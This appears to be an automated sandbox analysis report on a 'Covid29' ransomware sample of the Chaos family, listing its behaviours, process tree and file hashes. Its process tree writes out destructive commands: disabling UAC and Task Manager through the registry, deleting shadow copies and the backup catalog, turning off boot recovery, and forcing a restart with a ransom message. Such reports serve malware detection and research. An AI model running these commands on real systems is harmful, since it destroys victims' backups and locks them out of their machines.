Resubmissions

16-04-2024 18:54

240416-xkfw5sbc9y 1

16-04-2024 18:48

240416-xftmfabb81 10

Analysis

  • max time kernel
    301s
  • max time network
    307s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-04-2024 18:48

General

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://Google.com
    1⤵
      PID:2604
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3988 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:1
      1⤵
        PID:4896
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5068 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:1
        1⤵
          PID:4772
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3684 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:2268
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5428 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:1
            1⤵
              PID:5108
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5808 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:872
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5340 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:1
                1⤵
                  PID:2096
                • C:\Windows\system32\werfault.exe
                  werfault.exe /h /shared Global\321d431ab11f48acba72346a39665c32 /t 4296 /p 1488
                  1⤵
                    PID:716
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                    1⤵
                    • Enumerates system info in registry
                    • Modifies data under HKEY_USERS
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:4332
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffd88659758,0x7ffd88659768,0x7ffd88659778
                      2⤵
                        PID:3288
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:2
                        2⤵
                          PID:3040
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                          2⤵
                            PID:1660
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2292 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                            2⤵
                              PID:3904
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3236 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                              2⤵
                                PID:2084
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3276 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                2⤵
                                  PID:1152
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4684 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                  2⤵
                                    PID:2860
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4892 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                    2⤵
                                      PID:4296
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4912 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                      2⤵
                                        PID:4248
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4088 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                        2⤵
                                          PID:956
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                          2⤵
                                            PID:1424
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                            2⤵
                                              PID:4144
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5212 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                              2⤵
                                                PID:316
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5728 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                                2⤵
                                                  PID:1748
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=956 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                                  2⤵
                                                    PID:3608
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5240 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:1
                                                    2⤵
                                                      PID:3640
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                                      2⤵
                                                        PID:2424
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5608 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:2
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2376
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                                        2⤵
                                                          PID:1780
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 --field-trial-handle=1932,i,7453066748698516489,14058640904435146411,131072 /prefetch:8
                                                          2⤵
                                                            PID:2796
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                          1⤵
                                                            PID:3196
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffd88659758,0x7ffd88659768,0x7ffd88659778
                                                              2⤵
                                                                PID:1112
                                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                              1⤵
                                                                PID:1176
                                                              • C:\Windows\System32\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                1⤵
                                                                  PID:1284
                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
                                                                  1⤵
                                                                    PID:4376
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5996.tmp\TrojanRansomCovid29.bat" "
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Modifies registry class
                                                                      PID:1440
                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5996.tmp\fakeerror.vbs"
                                                                        3⤵
                                                                          PID:1844
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping localhost -n 2
                                                                          3⤵
                                                                          • Runs ping.exe
                                                                          PID:4436
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:3212
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:3000
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:4480
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:3528
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                          • Modifies registry key
                                                                          PID:2540
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                          3⤵
                                                                          • UAC bypass
                                                                          • Modifies registry key
                                                                          PID:2136
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                          3⤵
                                                                          • UAC bypass
                                                                          • Modifies registry key
                                                                          PID:2104
                                                                        • C:\Users\Admin\AppData\Local\Temp\5996.tmp\mbr.exe
                                                                          mbr.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Writes to the Master Boot Record (MBR)
                                                                          PID:60
                                                                        • C:\Users\Admin\AppData\Local\Temp\5996.tmp\Cov29Cry.exe
                                                                          Cov29Cry.exe
                                                                          3⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2176
                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Drops startup file
                                                                            • Executes dropped EXE
                                                                            • Drops desktop.ini file(s)
                                                                            • Sets desktop wallpaper using registry
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1508
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                                              5⤵
                                                                                PID:2068
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin delete shadows /all /quiet
                                                                                  6⤵
                                                                                  • Interacts with shadow copies
                                                                                  PID:2444
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic shadowcopy delete
                                                                                  6⤵
                                                                                    PID:3852
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                                                  5⤵
                                                                                    PID:4908
                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                      6⤵
                                                                                      • Modifies boot configuration data using bcdedit
                                                                                      PID:2540
                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                      bcdedit /set {default} recoveryenabled no
                                                                                      6⤵
                                                                                      • Modifies boot configuration data using bcdedit
                                                                                      PID:716
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                    5⤵
                                                                                      PID:2008
                                                                                      • C:\Windows\system32\wbadmin.exe
                                                                                        wbadmin delete catalog -quiet
                                                                                        6⤵
                                                                                        • Deletes backup catalog
                                                                                        PID:1504
                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                                      5⤵
                                                                                        PID:456
                                                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                    3⤵
                                                                                      PID:1908
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping localhost -n 9
                                                                                      3⤵
                                                                                      • Runs ping.exe
                                                                                      PID:3868
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im explorer.exe
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:804
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5996.tmp\Cov29LockScreen.exe
                                                                                      Cov29LockScreen.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3452
                                                                                • C:\Windows\system32\vssvc.exe
                                                                                  C:\Windows\system32\vssvc.exe
                                                                                  1⤵
                                                                                    PID:4900
                                                                                  • C:\Windows\system32\wbengine.exe
                                                                                    "C:\Windows\system32\wbengine.exe"
                                                                                    1⤵
                                                                                      PID:2332
                                                                                    • C:\Windows\System32\vdsldr.exe
                                                                                      C:\Windows\System32\vdsldr.exe -Embedding
                                                                                      1⤵
                                                                                        PID:1128
                                                                                      • C:\Windows\System32\vds.exe
                                                                                        C:\Windows\System32\vds.exe
                                                                                        1⤵
                                                                                        • Checks SCSI registry key(s)
                                                                                        PID:3692

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                        Filesize

                                                                                        40B

                                                                                        MD5

                                                                                        85cfc13b6779a099d53221876df3b9e0

                                                                                        SHA1

                                                                                        08becf601c986c2e9f979f9143bbbcb7b48540ed

                                                                                        SHA256

                                                                                        bd34434d117b9572216229cb2ab703b5e98d588f5f6dfe072188bd3d6b3022f3

                                                                                        SHA512

                                                                                        b248162930702450893a112987e96ea70569ac35e14ef5eb6973238e426428272d1c930ce30552f19dd2d8d7754dc1f7f667ecd18f2c857b165b7873f4c03a48

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

                                                                                        Filesize

                                                                                        136KB

                                                                                        MD5

                                                                                        74023dd7e1298f9499eabad99575e738

                                                                                        SHA1

                                                                                        405f3833ea55b5cc863701d051268d5ad6e08758

                                                                                        SHA256

                                                                                        638a642107e49e51181c89cabc191ec70dfda7416a73b45e6cdcc02d972f3dad

                                                                                        SHA512

                                                                                        e8732d5bcf5b530e57b572e6a15ce00ac4302cc0a5410c1851128b05e5cb1e6635f7aa6d7a9ff8d0792cdee4faeb2c6fd5f1c2c66074070990b21de64b366b50

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                        Filesize

                                                                                        3KB

                                                                                        MD5

                                                                                        6425cc62a12e0e2dd8548c06347bb78c

                                                                                        SHA1

                                                                                        22c4ee0c810dd075666f153182248d5fc76ef96e

                                                                                        SHA256

                                                                                        72669073e38b17872f184b77cf7b7af626f45b6741216eecde0d94696b27e18a

                                                                                        SHA512

                                                                                        4b3365b32c380eb95113e761ff070d773f9f512c8754c4a80fb0fa01f15fbfd0212c4bb764a548e70753de105bd6155bbe5fdc705bc7dbee52fc1c31f390b171

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                        Filesize

                                                                                        3KB

                                                                                        MD5

                                                                                        3076e342bfce5434e3de680323694ffb

                                                                                        SHA1

                                                                                        e808474b5cfdd67702babb0878199c95bf5b24a6

                                                                                        SHA256

                                                                                        1c8247b5ee88688345c719ba8870f6fa7dc5c243e70380d589f29a2d215227a2

                                                                                        SHA512

                                                                                        321591d9c284b2804578773ba0c9282378a75d982894eb9b3568bf1712648a17d4a379e184deb78f42544c8552acc41588b3d851c5170b2a0f02ba31cb6638e4

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        5b607d88752c3dd327ad75bf7fa7a591

                                                                                        SHA1

                                                                                        a34e549e569b9eaa5a6e3365fec356156495d070

                                                                                        SHA256

                                                                                        6528579e1d87df1bb393acb3117cc2da9670eb34aea3e1eb26eb31b125eda2f1

                                                                                        SHA512

                                                                                        e4c4f13bdb01033d410b39030c566e34c287a04cba5dd64b34419e2006c92c6bdb758716d2636cb51e8688d0d7ffb8138ccf2a0fb60122196e910d4727cb1926

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                        Filesize

                                                                                        23B

                                                                                        MD5

                                                                                        3fd11ff447c1ee23538dc4d9724427a3

                                                                                        SHA1

                                                                                        1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                        SHA256

                                                                                        720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                        SHA512

                                                                                        10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                        Filesize

                                                                                        3KB

                                                                                        MD5

                                                                                        8429ba697c64307a4ba3ef597a6063a8

                                                                                        SHA1

                                                                                        a88e27d6d0a06db1dafcd82b4a5f0c6b6639a566

                                                                                        SHA256

                                                                                        58a5b5b35f2e5a34cfb85e91c88c4d9579f479bdc254fa08e8583d70f64aeaa2

                                                                                        SHA512

                                                                                        1c2f3e3906441ded0b83a4759c35d60b9b8b20132cc82541f773f41593f75d98909119b854f435cd94b3af7e40494a2f79d1159ed92710fb7a733574cba5a2c5

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                        Filesize

                                                                                        3KB

                                                                                        MD5

                                                                                        ae95a48a194e96cdaa07d74eccd8585e

                                                                                        SHA1

                                                                                        9a66700948dde5c13cd87e56162116fb7f48d3c9

                                                                                        SHA256

                                                                                        71418762a9ce464702356e61666416b332acbd9366a7726383c0bd109281aabf

                                                                                        SHA512

                                                                                        81c99a67db78c0f03da6e63166cf5971dee3b94d11131056579032039a299fa31a4f4550bdd6f54921bd6c578b2f5cdecc9909494ca57d7d322bbfc0ed28c1a5

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                        Filesize

                                                                                        4KB

                                                                                        MD5

                                                                                        890004192d26e69896bf926945273e44

                                                                                        SHA1

                                                                                        cfdef2041b0120d15df34334b67bd50924e76678

                                                                                        SHA256

                                                                                        a6fa99fea950cefcd680de661c73fa581dc523241ed75808c80b00d8bf373354

                                                                                        SHA512

                                                                                        0d113bd902b1df9421e6812a032d40ced32280abeea15f261b48b9ffc4096deaa3c61efbefb0145475149777c187429efba982cf7d7e3374488e1cafe2a35759

                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        c8a92cc63436c4c93c69a6bb68a44449

                                                                                        SHA1

                                                                                        90ffb49b0ae40e86c06d574d7f2b28a255c9184b

                                                                                        SHA256

                                                                                        03cb8cd4be4b7f505261eebbf78e0b9580170bb36623199c6fc32bf7df879a4c

                                                                                        SHA512

                                                                                        92aae4a61548f42ef7407177304e390ddb842a298c883c99d6e2d814e24c5f7a105de6a9b2ebc23f344791e182a5d8acf91acf132719208200cd6f541825ca0e

